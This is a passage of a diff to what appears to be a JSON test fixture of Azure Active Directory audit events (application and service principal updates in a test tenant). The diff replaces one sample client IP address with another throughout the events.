application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"corre
lationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1037807Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438635\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"8f6eb24b-6e61-4ee2-a376-31368c300613\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": 
true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update 
application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
 },
 "o365audit": {
 "Actor": [
@@ -502,9 +502,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-09T15:33:26",
 "ExtendedProperties": [
 {
@@ -707,7 +707,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1638042Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438642\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"b2cc2456-5ac5-4399-b960-82a40036476f\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Update service 
principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\
"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1638042Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438642\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"b2cc2456-5ac5-4399-b960-82a40036476f\",\"ModifiedProperties\":[{\"Name\":\"Included Updated 
Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
 },
 "o365audit": {
 "Actor": [
@@ -737,9 +737,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-09T15:33:26",
 "ExtendedProperties": [
 {
@@ -954,7 +954,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1638042Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438642\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"b2cc2456-5ac5-4399-b960-82a40036476f\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Update service 
principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\
"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1638042Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438642\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\